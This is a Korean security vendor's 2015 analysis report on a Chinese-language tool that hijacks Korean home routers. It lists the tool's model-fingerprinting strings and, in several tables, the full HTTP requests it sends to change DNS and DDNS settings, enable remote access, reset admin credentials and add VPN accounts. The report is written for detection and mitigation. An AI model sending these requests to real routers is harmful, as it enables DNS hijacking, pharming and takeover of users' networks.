2027qKmmU

NSHC 

2015. 01. 21 

[국내 대표 공유기 대상 해킹 도구] 

본 보고서는 공유기 DNS 정보를 변조하여 파밍 및 피싱 등에 악용한 것으로 추정되는 

해킹 도구에 대한 분석 보고서이다. 해킹 도구 분석 결과 사용자 인터페이스(GUI)는 중국 

어로 되어 있으며, 주요 기능은 ‘공유기 암호 임의 변경’,’네트워크 정보 변경(TCP/IP, 

VPN)’ 및 ‘사용자 계정 정보 변경’이다. 해킹 가능한 공유기 목록은 총 22종이며, 대부분 

국내 제조사의 공유기를 대상으로 제작되었으며, 공격 도구에서 한국어 패턴의 검색 기능 

등이 포함되어 한국이라는 제한된 지역의 IT 인프라를 공격하기 위한 목적으로 개발 된 

것으로 파악하고 있다. 

Information Service about a new vulnerability 

Version 1.1 External. 

© 2015 Red Alert. All Rights Reserved.

목 

차 

1. 공격 도구 개요 ....................................................................................... 2 

2. 상세 분석 내용 ....................................................................................... 5 

3. 공유기 0day 취약점 리포트 ............................................................... 15 

4. 대응방안 ................................................................................................ 15 

5. Reference .............................................................................................. 16 

Notice 

This document contains information which is the intellectual property of NSHC Inc. and Red Alert 

team only. This document is received in confidence and its contents cannot be disclosed or copied 

without the prior written consent of NSHC. Nothing in this document constitutes a guaranty, warranty, 

or license, expressed or implied. NSHC disclaims all liability for all such guaranties, warranties, and 

licenses, including but not limited to: Fitness for a particular purpose; merchantability; non 

infringement of intellectual property or other rights of any third party or of NSHC 

COPYRIGHT 

Copyright. NSHC Inc. All rights reserved. 

facebook.com/nshc.redalert © 2015 Red Alert. All Rights Reserved. 1

1. 공격 도구 개요 

최근 커피숍과 같은 공공장소에서 무료 Wi-fi를 통해 무선 인터넷에 접속했을 때 크롬 최신 버전 

이 나왔다며 업데이트를 유도하여 사용자 PC에 악성코드를 감염시키는 사고가 발생하고 있다. 또 

한, 포탈 사이트 접속 시 보안 관련 인증절차를 진행하고 있다며 금융기관의 팝업 창이 뜨면서 금 

융 개인 정보 등이 유출되는 사고도 증가하고 있다. 

이러한 두 사례는 공공장소의 무료 Wi-fi를 제공하는 국내산 공유기를 해킹하여 Wi-fi에 접속한 

사용자가 파밍 사이트로 연결된 경우다. 이러한 공유기 해킹사건이 빈번히 일어난 가운데 중국 해 

커들이 사용하는 것으로 추정되는 해킹 도구가 발견되었다. 본 보고서는 이러한 해킹 도구에 대한 

분석 내용을 포함하고 있으며, 국내의 공유기의 0-day 취약점에 1 대한 정보를 포함하고 있다. 

최근 국내에서 제조된 공유기에 대한 보안 위협 사례가 증가되고, 관련하여 자동화된 도구들이 

인터넷을 통해 발견 되기 때문에 공유기를 사용하는 기관이나 기업에서는 특별한 보안 관리가 

필요한 상황이다. 국내의 중요 기반 시설의 경우 내부망의 무선 공유기 사용을 제한하고, 

네트워크에 대한 안전한 접근 통제 및 관리가 필요하다. 

1 

0-day 취약점: 제로 데이 공격(또는 제로 데이 위협, Zero-Day Attack)은 컴퓨터 소프트웨어의 취약점을 

공격하는 기술적 위협으로, 해당 취약점에 대한 패치가 나오지 않은 시점에서 이루어지는 공격을 말한다. 이 

러한 시점에서 만들어진 취약점 공격(익스플로잇)을 제로 데이 취약점 공격이라고도 한다. 


Malware Name 082983ec44b3996303459a603e454f0d.exe 

File Size 1,105,920 Byte MD5 082983EC44B3996303459A603E454F0D 

Compiled Date 2014.09.24 18:21:04 Etc N/A 

File Type PE32, Intel 80386 Language 중국어 

국내산 공유기 22종: 에어벤드, 엑슬러, 애니게이트, LGU+공유기, 엘럭시온, 

공격 대상 

하이온넷, ipTime, 티브로드 공유기(KWS), LG상사 엑슬러, 맥시오, 넥스트, 네트 

윈, 오비트, 파테크, SDT정보기술, 스마트게이트, 스파이어, 시리우스, 유니콘, 

지오, 위보, 네티스 

표 1. 파일 정보 

Index 

Description 

OS 

Windows XP SP3 KOR 

Browser Windows Internet Explorer 8 

표 2. 분석 환경 

중국어 전용 IDE ( 易语言概述 ,, http://www.eyuyan.com/eprc.htm)로 개발된 해당 툴의 사용자 인터 

페이스는 아래와 같습니다. 

그림 1. 사용자 인터페이스 


그림1. 보안뉴스 보도자료 2015.01.20 


2. 상세 분석 내용 

공유기 관리 페이지의 HTML 소스에서 아래와 같은 특정 패턴을 검색하여 해당되는 공유기 제품 

을 확인합니다. 일부 검색 패턴에서 한국어가 포함되어 있습니다. 

URL=login/login.cgi 

location.href='/index.asp' 

URL=/cgi-bin/start.cgi 

/cgi-bin/start.cgi 

location.href = '/login.html' 

location.href = '/login.html' 

url=home.htm 

/cgi-bin/timepro.cgitmenu=main_frame&smenu=main_frame 

/cgi-bin/timepro.cgi 

url=netisp.htm 

URL=cgi-bin/command.cgim1=viewinfo 

location='/login.cgi 

WeVO 

css/anygate 

img/anygate_style 

ipTIME 

SMARTGATE 

ANYGATE 

AIRBAND 

OViTT 

SPIRE 

MAP11N 

./styles/default.css 

/css/normal_ws.css 

SDT Information 

Sirius technology 

UNICORN 

ELEXION 

ZIO ROUTER 

timepro.cgi 

netis setup 

犽媹旖橃爼氤挫嫓鞀 

util.js 


NetweeN 

images/ZIO-N-series-UI.jpg 

Haionnet 

LGI 

The Better Smart Life 

KWS- 

표 3-1. 검색 패턴 목록 

상태정보 

연결 정보 

상태 정보 

파테크(PATECH) 

엑슬러(AXLER) 

롯데마트 유무선공유기 

표 4-2. 한국어 검색 패턴 항목 


탐색되는 공유기 제품에 따라 공유기 설정 페이지에 접근하며, POST 메소드를 이용하여 DNS 정 

보에 접근합니다. 

ID 

공유기 정보 

(제조사) 

DNS 정보 접근 경로 

1 WeVO 

2 

3 

AnyGate 

4 

5 

6 

ipTIME 

7 

hxxp://[Target_IP]:[Target_Port]/goform/setup_basdns=1&mtu=1500&clone=0&page 

_type=wan_dhcp.asp&dns1_ip=[DNS_IP#1]&dns2_ip=[DNS_IP#2]&wan_mac=&menu 

_flag=131 

hxxp://[Target_IP]:[Target_Port]/goform/setup_basdns_server=static&dns1_ip=[DNS_I 

P#1]&dns2_ip=[DNS_IP#2]&fixed_mtu=1500&use_wan_fmac=use&wan_mac1=00&w 

an_mac2=00&wan_mac3=00&wan_mac4=00&wan_mac5=00&wan_mac6=00&wan_ 

mac=&page_type=wan_dynamic.asp 

hxxp://[Target_IP]:[Target_Port]/goform/setup_basdns=1&mtu=1500&clone=0&wan_ 

mac1=00&wan_mac2=00&wan_mac3=00&wan_mac4=00&wan_mac5=00&wan_mac 

6=00&page_type=wan_dynamic.asp&dns1_ip=[DNS_IP#1]&dns2_ip=[DNS_IP#2]&wa 

n_mac= 

hxxp://[Target_IP]:[Target_Port]/goform/setup_basdns_server=static&dns1_ip=[DNS_I 

P#1]&dns2_ip=[DNS_IP#2]&wan_mac=&use_wan_fmac=use&page_type=wan_dynam 

ic.asp 

hxxp://[Target_IP]:[Target_Port]/goform/formWanTcpipSetupipMode=pptp&wanType 

=autoIp&submiturl=%2Ftcpipwan.asp&save=%BC%B3%C1%A4+%C0%FB%BF%EB&hostName=anyga 

te_router&dhcpMtuSize=1492&dnsMode=dnsManual&dns1=[DNS_IP#1]&dns2=[DN 

S_IP#2]&wan_macAddr=000000000000&igmpproxyEnabled=ON&pingWanAccess=O 

N&webWanAccess=ON&webwanAccessPort=[Target_Port]&WANPassThru1=ON&W 

ANPassThru2=ON&WANPassThru3=ON 

hxxp://[Target_IP]:[Target_Port]/cgibin/timepro.cgitmenu=netconf&smenu=wansetup&act=save&wan=wan1&ifname= 

eth1&sel=dynamic&wan_type=dynamic&allow_private=on&dns_dynamic_chk=on&f 

dns_dynamic1=[PDNS#1]&fdns_dynamic2=[PDNS#2]"&fdns_dynamic3=[PDNS#3]&f 

dns_dynamic4=[PDNS#4]&sdns_dynamic1=[SDNS#1]&sdns_dynamic2=[SDNS#2]&sd 

ns_dynamic3=[SDNS#3]&sdns_dynamic4=[SDNS#4]&userid=&passwd=&mtu.pppoe. 

eth1=1454&lcp_flag=1&lcp_echo_interval=30&fdns_static1=&fdns_static2=&fdns_st 

atic3=&fdns_static4=&sdns_static1=&sdns_static2=&sdns_static3=&sdns_static4=& 

mtu.static.eth1=1500 

hxxp://[Target_IP]:[Target_Port]/do_cmd.htmCMD=WAN&GO=netconf_wansetup.html 

&SET0=50397440%3D2&SET1=50856960%3D64-E5-99-99-4C- 

D6&SET2=235077888%3D1&SET3=235012865%3D[DNS_IP#1]&SET4=235012866%3 

D[DNS_IP#2]&SET5=51118336%3D0&SET6=51839232%3D1&SET7=51511552%3D15 

00&SET8=117834240%3D&SET9=117703168%3D&SET10=117637376%3D1492&SET 

11=51446016%3D1500&SET12=50463488%3D0.0.0.0&SET13=50529024%3D0.0.0.0& 


8 SMARTGATE 

9 AIRBAND 

10 OViTT 

11 SPIRE 

12 V10 

13 MAP11N 

14 

U+ 

15 

SDT 

16 

Information 

SET14=50594560%3D0.0.0.0 

hxxp://[Target_IP]:[Target_Port]/goform/formWanTcpipSetup 

ipMode=pptp&wanType=autoIp&submiturl=%2Ftcpipwan.asp&save=%BC%B3%C1%A4+%C0%FB%BF%EB&fixedIpMtuSize=1 

500&hostName=smartgate_router&dhcpMtuSize=1492&dnsMode=dnsManual&dns 

1=[DNS_IP#1]&dns2=[DNS_IP#2]&wan_macAddr=000000000000&upnpEnabled=ON 

&igmpproxyEnabled=ON&pingWanAccess=ON&webWanAccess=ON&webwanAcce 

ssPort=[Target_Port]&WANPassThru1=ON&WANPassThru2=ON&WANPassThru3=O 

N 

hxxp://[Target_IP]:[Target_Port]/cgibin/command.cgim1=wansetup&m2=dynamic&apply=1&wan_name=&conn_type= 

dynamic&autodns=on&dns11=[PDNS#1]&dns12=[PDNS#2]&dns13=[PDNS#3]&dns 

14=[PDNS#4]&dns21=[SDNS#1]&dns22=[SDNS#2]&dns23=[SDNS#3]&dns24=[SDN 

S#4]&mtu=1500 




S#4]&mtu=1500&allow_private=on 





hxxp://[Target_IP]:[Target_Port]/wan_work_mode_dhcp_set.cgi 

mac_clone_value=[MAC]&mtu_value=1496&dns_ip_aa=[DNS_IP#1]&dns_ip_bb=[DNS 

_IP#2]&apply=++%C0%FB%BF%EB++ 

hxxp://[Target_IP]:[Target_Port]/goform/setup_bas 

mtu=1500&dns_server=static&dns1_ip=[DNS_IP#1]&dns2_ip=[DNS_IP#2]&wan_mac 

=&use_wan_fmac=use&page_type=wan_dynamic.asp 

hxxp://[Target_IP]:[Target_Port]/apply.cgi 

redirect_page=menu1_1.html&cgi_action=apply&cgi_save=1&restart_enable=1&rest 

art_type=wan&macclone_enable=0&macclone_macaddr=&macclone_macaddrold=& 

network_dns1=[DNS_IP#1]&network_dns2=[DNS_IP#2]&mhddr=on 

hxxp://[Target_IP]:[Target_Port]/goform/mcr_setWan 

connectionType=1&staticIp=&staticNetmask=&staticGateway=&DhcpDNSSelRadio= 

1&wanDNS1=[DNS_IP#1]&wanDNS2=[DNS_IP#1]&macCloneEnbl=0&macCloneMac 

=&connection_dhcp=on&macClone_default=0&pppoeUser=%3C+%25+mcr_getCfgI 

nterface%28%27PppoeCfgParam_UserName%27%29%3B+%25+%3E&pppoePass= 





17 NEXT 

Sirius 

18 

technology 

19 

UNICORN 

20 

21 ELEXION 

22 

ZIO 

23 

24 ZIOROUTER 


hxxp://[Target_IP]:[Target_Port]/wan_work_mode_dhcp_set.cgidns_ip_aa=[DNS_IP#1] 

&dns_ip_bb=[DNS_IP#2]&mac_clone_value=[MAC]&mtu_value=1496 





hxxp://[Target_IP]:[Target_Port]/boafrm/formWanTcpipSetup 

ipMode=pptp&pptpDynamicWanIP=0&wanType=autoIp&hostName=UNICORN&dh 

cpMtuSize=1492&dnsMode=dnsManual&dns1=[DNS_IP#1]&dns2=[DNS_IP#2]&dns 

3=0.0.0.0&wan_macAddr=000000000000&igmpType=1&upnpEnabled=ON&pingWa 

nAccess=ON&webWanAccess=ON&WebAccessPort=[Target_Port]&WANPassThru1= 

ON&WANPassThru2=ON&WANPassThru3=ON&ipv6_passthru_enabled=ON&submit 

- 

url=%2Ftcpipwan.htm&save=++%EC%84%A4%EC%A0%95%EA%B0%92+%EB%B3%8 

0%EA%B2%BD++&clientMac=00%3A00%3A00%3A00%3A00%3A00 

hxxp://[Target_IP]:[Target_Port]/boafrm/formWanTcpipSetupipMode=pptp&pptpDyn 

amicWanIP=0&opMode=0&swispWanId=0&mode0=0&ssid0=&wan_op_mode=0& 

wisp_ssid=&AP_channel=none&wisp_wlan_sec_mode=0&wisp_wep_key_len=2&wisp 

_wep_key_type=0&wisp_wep_key_str=&wisp_wpa_method=2&wisp_wpa_psk_type=0 

&wisp_wpa_psk_str=&wisp_wpa_rey_int=86400&wanType=autoIp&fixedIpMtuSize=1 

500&dhcpMtuSize=1492&dnsMode=dnsManual&dns1=[DNS_IP#1]&dns2=[DNS_IP# 

2]&wan_macAddr=000000000000&upnpEnabled=ON&igmpproxyEnabled=ON&web 

WanAccess=ON&WANPort=[Target_Port]&ftpWanAccess=ON&FTPPort=8115&WAN 

PassThru1=ON&WANPassThru2=ON&WANPassThru3=ON&submiturl=%2Ftcpipwan.htm&save=%EC%A0%81%EC%9A%A9 

hxxp://[Target_IP]:[Target_Port]/boafrm/formWanTcpipSetupipMode=pptp&pptpDyn 

amicWanIP=0&wanType=autoIp&hostName=UNICORN&dhcpMtuSize=1492&dnsM 

ode=dnsManual&dns1=[DNS_IP#1]&dns2=[DNS_IP#2]&dns3=0.0.0.0&wan_macAddr 

=000000000000&igmpType=1&upnpEnabled=ON&pingWanAccess=ON&webWanA 

ccess=ON&WebAccessPort=[Target_Port]&WANPassThru1=ON&WANPassThru2=O 

N&WANPassThru3=ON&ipv6_passthru_enabled=ON&submiturl=%2Ftcpipwan.htm&save=++%EC%84%A4%EC%A0%95%EA%B0%92+%EB%B3%8 

0%EA%B2%BD++&clientMac=00%3A00%3A00%3A00%3A00%3A00 

hxxp://[Target_IP]:[Target_Port]/cgi-binigd/wan_work_mode_dhcp_set.cgiphysical_address=[MAC]&mtu_value=1496&dns_ip 

_aa=[DNS_IP#1]&dns_ip_bb=[DNS_IP#2] 

hxxp://[Target_IP]:[Target_Port]/cgi-bin-igd/wan_work_mode_dhcp_set.cgi 

wanid_no=&physical_address=[MAC]&mtu_value=1496&dns_ip_aa=[DNS_IP#1]&dns 

_ip_bb=[DNS_IP#2]&submitbutton=%EC%A0%81%EC%9A%A9&wan_op_mode=0 


ipMode=pptp&wanType=autoIp&hostName=Zio_Router&dhcpMtuSize=1500&dns 


25 netis 

26 CAPD 

27 NetweeN 

28 Haionnet 

29 LGIAxler 

30 KWS 

Mode=dnsManual&dns1=[DNS_IP#1]&dns2=[DNS_IP#2]&wan_macAddr=000000000 

000&macCloneMacFill=MAC+%C1%D6%BC%D2+%BA%B9%BB%E7&submiturl=%2Ftcpipwan.asp&save=%BC%B3%C1%A4+%C0%FB%BF%EB 

hxxp://[Target_IP]:[Target_Port]/boafrm/form_tcpip_wan 

wan_op_mode=0&name_ssid=&AP_channel=none&name_wpaMode=0&name_sec_l 

en_web=2&name_sec_method_web=0&name_sec_str=&name_method_wpa=2&nam 

e_sec_len_wpa=0&name_sec_str_wpa=&name_perio_wpa=86400&name_wan_wire_m 

ode=1&name_wan_wireless_mode=1&name_mtu_option=1500&name_dns1_option= 

[DNS_IP#1]&name_dns2_option=[DNS_IP#2]&name_wan_mac=[MAC]&name_submit 

_url=%2Ftcpipwan.htm&name_button=save&name_channel=7&name_bgn= 

hxxp://[Target_IP]:[Target_Port]/dacom_basic_wan.asp 

action=Apply&page=dacom_basic_wan.asp&wan_unit=0&wan_proto=dhcp&wan_dn 

s=2&dns_mode=user&wan_dns0=[DNS_IP#1]&wan_dns1=[DNS_IP#2]&hwuse_enabl 

e=0&noac=%C8%AE+%C0%CE 

hxxp://[Target_IP]:[Target_Port]/goform/setWan 

connectionType=DHCP&mtu_dhcp=1500&manual=2&dnsserver=[DNS_IP#1]&dnsse 

rver2=[DNS_IP#2] 

hxxp://[Target_IP]:[Target_Port]/index.phppage=net_setting/dhcp_svr_setting 

GW_IP1=[]&GW_IP2=[]&GW_IP3=[]&GW_IP4=[]&SU_IP1=[]&SU_IP2=[]&SU_IP3=[]&S 

U_IP4=[]&SUB_IP1=[]&SUB_IP2=[]&SUB_IP3=[]&SUB_IP4=[]&DNS1_IP1=[]&DNS1_IP2 

=[]&DNS1_IP3=[]&DNS1_IP4=[]&DNS2_IP1=[]&DNS2_IP2=[]&DNS2_IP3=[]&DNS2_IP 

4=[]&DY1_IP1=[]&DY1_IP2=[]&DY1_IP3=[]&DY1_IP4=[]&DY2_IP1=[]&DY2_IP2=[]&DY 

2_IP3=[]&DY2_IP4=[]&setup=%BC%B3%C1%A4 

hxxp://[Target_IP]:[Target_Port]/cgibin/command.cgim1=wansetup&act=save&sel=dynamic&dns_dynamic_chk=on&fd 

ns_dynamic1=[PDNS#1]&fdns_dynamic2=[PDNS#2]&fdns_dynamic3=[PDNS#3]&fdn 

s_dynamic4=[PDNS#4]&sdns_dynamic1=[SDNS#1]&sdns_dynamic2=[SDNS#2]&sdns 

_dynamic3=[SDNS#3]&sdns_dynamic4=[SDNS#4]&mtu=1454&static_mtu=1500&hw 

_conf_static=on 


ipMode=pptp&wanType=autoIp&fixedIpMtuSize=1492&hostName=&dhcpMtuSize 

=1492&pppConnectType=0&pppMtuSize=1492&pptpConnectType=0&pptpMtuSize 

=1492&l2tpConnectType=0&l2tpMtuSize=1492&dnsMode=dnsManual&dns2=[DNS 

_IP#1]&wan_macAddr=000000000000&pingWanAccess=ON&webWanAccess=ON& 

WANPassThru1=ON&WANPassThru2=ON&submiturl=%2Ftcpipwan.asp&save=%EC%A0%81%EC%9A%A9 

표 5. DNS 정보 접근 목록 


탐색되는 공유기 제품에 따라 공유기 설정 페이지에 접근하며, POST 메소드를 이용하여 DDNS 

정보에 접근합니다. 이때 사용되는 서브 도메인은 아래와 같습니다. 

- zclr2430 

ID 


(제조사) 

DDNS 정보 접근 경로 

1 WeVO 

2 

3 

PATECH - 

AXLER 

4 

5 

hxxp://[Target_IP]:[Target_Port]/goform/setup_adv 

ddns1_use=1&ddns1_id=[SubDomain]&ddns1_domain=webip.tv&ddns2_use=0&dd 

ns2_id=&ddns2_pass=&ddns2_domain=&page_type=ddns.asp&menu_flag=255 

hxxp://[Target_IP]:[Target_Port]/goform/formRegMyAxlerDomain 

DDNS=[SubDomain].myaxler.org 

hxxp://[Target_IP]:[Target_Port]/goform/formDdns 

ddnsEnabled=ON&axlerddnsDomainName=[SubDomain].myaxler.org&ddnsDomain 

Name=host.dyndns.org&axlerName=[SubDomain]&axlerzone=1&ddnsType=0&dyn 

dnsName=host.dyndns.org&tzoName=&ddnsUser=&ddnsPassword=&save=1 

hxxp://[Target_IP]:[Target_Port]/boafrm/formRegMyAxlerDomainDDNS=[SubDomain]. 

myaxler.org 

hxxp://[Target_IP]:[Target_Port]/boafrm/formDdnsddnsEnabled=ON&axlerddnsDomai 

nName=[SubDomain].myaxler.org&ddnsDomainName=host.dyndns.org&axlerName 

=[SubDomain]&axlerzone=1&ddnsType=0&dyndnsName=host.dyndns.org&tzoNam 

e=&ddnsUser=&ddnsPassword= 

표 6. DDNS 정보 접근 목록 

탐색되는 공유기 제품에 따라 공유기 설정 페이지에 접근하며, POST 메소드를 이용하여 TCP/IP 

설정 정보에 접근합니다. 

ID 


(제조사) 

TCP/IP 설정 정보 접근 경로 

1 WeVO 

PATECH - 

2 

AXLER 

hxxp://[Target_IP]:[Target_Port]/goform/setup_nat 

bsyn=1&bipsrc=1&bipspoof=0&bsmurf=1&bpscan=1&bstorm=1&arpvirus=0&bpin 

g=0&rman=1&rport=[Target_Port]&page_type=firewall.asp&menu_flag=143 


ipMode=pptp&wanType=autoIp&fixedIpMtuSize=1500&hostName=&dhcpMtuSize 

=1492&pppConnectType=0&pppIdleTime=5&pppMtuSize=1452&pptpConnectType 

=0&pptpIdleTime=5&pptpMtuSize=1460&l2tpConnectType=0&l2tpIdleTime=5&l2t 

pMtuSize=1460&dnsMode=dnsAuto&dns1=&dns2=&dns3=&wan_macAddr=00000 

0000000&WANPassThru1=ON&WANPassThru2=ON&WANPassThru3=ON&upnpEna 

bled=ON&igmpproxyEnabled=ON&pingWanAccess=ON&webWanAccess=ON&web 

WanAccessPort=[Target_Port] 


3 

hxxp://[Target_IP]:[Target_Port]/boafrm/formWanTcpipSetup 

wanType=autoIp&fixedIpMtuSize=1500&hostName=&dhcpMtuSize=1492&pppCon 

nectType=0&pppMtuSize=1452&wan_pptp_use_dynamic_carrier_radio=dynamicIP&p 

ptpConnectType=0&pptpMtuSize=1460&wan_l2tp_use_dynamic_carrier_radio=dyna 

micIP&l2tpEnableGetServIpByDomainName=1&l2tpServerAddrIsDomainName=0&l2t 

pConnectType=0&l2tpIdleTime=5&l2tpMtuSize=1460&dnsMode=dnsManual&dns1 

=168.126.63.1&dns2=168.126.63.2&dns3=0.0.0.0&wan_macAddr=000000000000&ig 

mpproxyEnabled=ON&pingWanAccess=ON&webWanAccess=ON&webWanAccessP 

ort=[Target_Port] 

표 7. TCP/IP 설정 접근 목록 

탐색되는 공유기 제품에 따라 공유기 설정 페이지에 접근하며, POST 메소드를 이용하여 계정 설 

정 정보에 접근합니다. 


ID 

계정 설정 정보 접근 경로 

(제조사) 

1 

AnyGate 

ipTIME 

MAP11N 

U+ 

CAPD 

Haionnet 

hxxp://[Target_IP]:[Target_Port]/goform/setup_advuse=0&old_pwd=&page_type=pas 

sword.asp 

hxxp://[Target_IP]:[Target_Port]/goform/setup_loginlogin=admin&mode=login 

hxxp://[Target_IP]:[Target_Port]/goform/setup_adv 

use_p=off&page_type=password.asp 

hxxp://[Target_IP]:[Target_Port]/goform/setup_loginlogin=admin&mode=login&reaso 

n= 

hxxp://[Target_IP]:[Target_Port]/cgibin/timepro.cgitmenu=sysconf&smenu=login&act=save&new_login=xj110&new_pa 

sswd=332233&confirm_passwd=332233 

hxxp://[Target_IP]:[Target_Port]/cgi-bin/timepro.cgi 

tmenu=sysconf&smenu=login&act=save&new_login=xj110&new_passwd=332233& 

confirm_passwd=332233 

hxxp://[Target_IP]:[Target_Port]/do_cmd.htm 

CMD=SYS&GO=sysconf_login.html&nowait=1&SET0=17498624%3Dxj110&SET1=16 

843264%3D332233 

hxxp://[Target_IP]:[Target_Port]/goform/login_with_wizard 

no_pwd=admin&login=admin&mode=login 

hxxp://[Target_IP]:[Target_Port]/login.cgi 

redirect_page=index.html&loginpwd=admin&mode=login&reason= 

hxxp://[Target_IP]:[Target_Port]/goform/mcr_verifyLoginPasswd 

UserID=&Password=admin 

hxxp://[Target_IP]:[Target_Port]/dacom_login.asp 

page=dacom_login.asp&hxxp_passwd=YWRtaW4%3D&hidden_action=Login 

hxxp://[Target_IP]:[Target_Port]/login_check.php 


PATECH - 

AXLER 

id=admin&passwd=admin&login=%B7%CE%B1%D7%C0%CE 

hxxp://[Target_IP]:[Target_Port]/goform/formPasswordSetup 

newpass=332233&username=axler&submiturl=%2Fw%2F06%2Fsetup.asp%3Flogout%3D1&confpass=332233&ApplyButton=%B 

C%B3%C1%A4%BA%AF%B0%E6 

hxxp://[Target_IP]:[Target_Port]/boafrm/formLogin 

userpassword=admin 

표 8. 계정 설정 정보 접근 목록 


탐색되는 공유기 제품에 따라 공유기 설정 페이지에 접근하며, POST 메소드를 이용하여 VPN 설 

정 정보에 접근합니다. 

ID 

1 

2 

3 

4 

5 

6 

7 

8 


(제조사) 

WeVO 

AXLER 

VPN 설정 정보 접근 경로 

hxxp://[Target_IP]:[Target_Port]/goform/setup_vpn 

VPN_use=1&sec_use=0&vpn_account=&vpn_password=&vpn_ip4=&onoff_1=0&buf 

_list=ON%2C[VPN_ID]%2C[VPN_PASS]%2C151%26&page_type=vpn_server_setup.asp 

&vpn_acct_index=0&mode=0&menu_flag=132 

hxxp://[Target_IP]:[Target_Port]/goform/setup_nat 

VPN_use=1&sec_use=0&vpn_account=&vpn_password=&vpn_ip4=&onoff_1=0&buf 

_list=ON%2C[VPN_ID]%2C[VPN_PASS]%2C151%26&page_type=vpn_server_setup.asp 

&vpn_acct_index=0&mode=0&menu_flag=132 

hxxp://[Target_IP]:[Target_Port]/goform/formPPTPSVR 

select1=ON&select2=ON&deletePPTP=1 


enabled=ON&ip1=192&ip2=168&ip3=0&ip4=85&ip=192.168.0.85&ip5=90&pptpRa 

ngeStart=&pptpRangeEnd=&pptpid=[VPN_ID]&pptppasswd=[VPN_PASS]&addPPTP 

=1 


enabled=ON&ip1=192&ip2=168&ip3=0&ip4=85&ip=&ip5=90&pptpRangeStart=19 

2.168.0.85&pptpRangeEnd=192.168.0.90&pptpid=&pptppasswd=&doPPTP=1 

hxxp://[Target_IP]:[Target_Port]/boafrm/formPPTPSVR 

select1=ON&select2=ON&deletePPTP=1 


pptpid=[VPN_ID]&pptppasswd=[VPN_PASS]&enabled=ON&ip4=85&ip5=90&ip=19 

2.168.0.85&pptpRangeStart=192.168.0.85&pptpRangeEnd=192.168.0.90&addPPTP=1 


enabled=ON&ip4=85&ip5=90&ip=&pptpRangeStart=192.168.0.85&pptpRangeEnd= 

192.168.0.90&doPPTP=1 

표 9. VPN 설정 정보 접근 


3. 공유기 0day 취약점 리포트 

지금까지 직접적으로 공유기 자체에 존재하는 취약점을 이용한 공격을 감지하지 못 하였으나, 잠 

재적인 보안 위협이 있을 것으로 판단됩니다. 또한, 전체적인 분석을 마치지 않는 상황에서 악성 

유무 판단 및 악성코드 제작 배경, 악성코드의 최종적인 목표, 지금까지 발견되고 있는 공유기 

DNS 해킹 관련 공격에 사용된 도구인지 여부 역시 단정지을 수 없습니다. 다만, 본 사고에 대한 

분석 과정 중에 다음과 같은 공유기의 일부 0-day 취약점을 발견하였습니다. 

해당 공유기 제조사는 KISA와의 협의를 통해 관련 취약점을 공유하여 보안 패치를 만들 수 있도 

록 무상으로 기술을 지원해 드리도록 하겠습니다. 

4. 대응방안 

펌웨어 업데이트를 통해 보안 패치가 적용된 최신 펌웨어를 사용하시기 바랍니다. 또, 일부 공유 

기들은 CSRF 공격 대응을 위해 로그인 기능에 캡차를 지원하고 있으니 기능을 활성화 시켜주시 

기 바라며, 공유기에서 사용하지 않는 부가 기능들은 최대한 ‘사용하지 않음’으로 변경하시기 바 

랍니다. 

- 공유기 관리자 페이지 및 무선 접속시 인증 사용(csrf 방지 기능이 존재하는 공유기일 경 

우 해당 기능도 활성화) 

- 공유기 원격 관리 기능 사용하지 않음 


- 제품 출고 시 기본적으로 관리자 페이지 인증 활성화 

- WI-FI 비밀번호를 제품마다 랜덤하게 설정하듯이 관리자 페이지 로그인 비밀번호 또한 

랜덤하게 설정하도록 함 

- 관리자 페이지 인증이 활성화 되지 않은 상태에서는 공유기 원격 관리 기능(외부에서 공 

유기 외부 IP에 직접 접근) 사용이 불가능하도록 함 

5. Reference 

[1] Virus Total 

https://www.virustotal.com/ko/file/0a242345aaa9192b0357890c42d22b4cf6abc0338880b49149fda7 

b23e761a36/analysis/ 

[2] 易语言概述 

http://www.eyuyan.com/eprc.htm 

[3] 보안뉴스 

http://www.boannews.com/media/view.aspidx=45112&kind=1 

http://www.boannews.com/media/view.aspidx=41510&kind=3 

[4] 전자신문 

http://www.etnews.com/20150115000079

2027qKmmU

Create successful ePaper yourself

Delete template?

Save as template?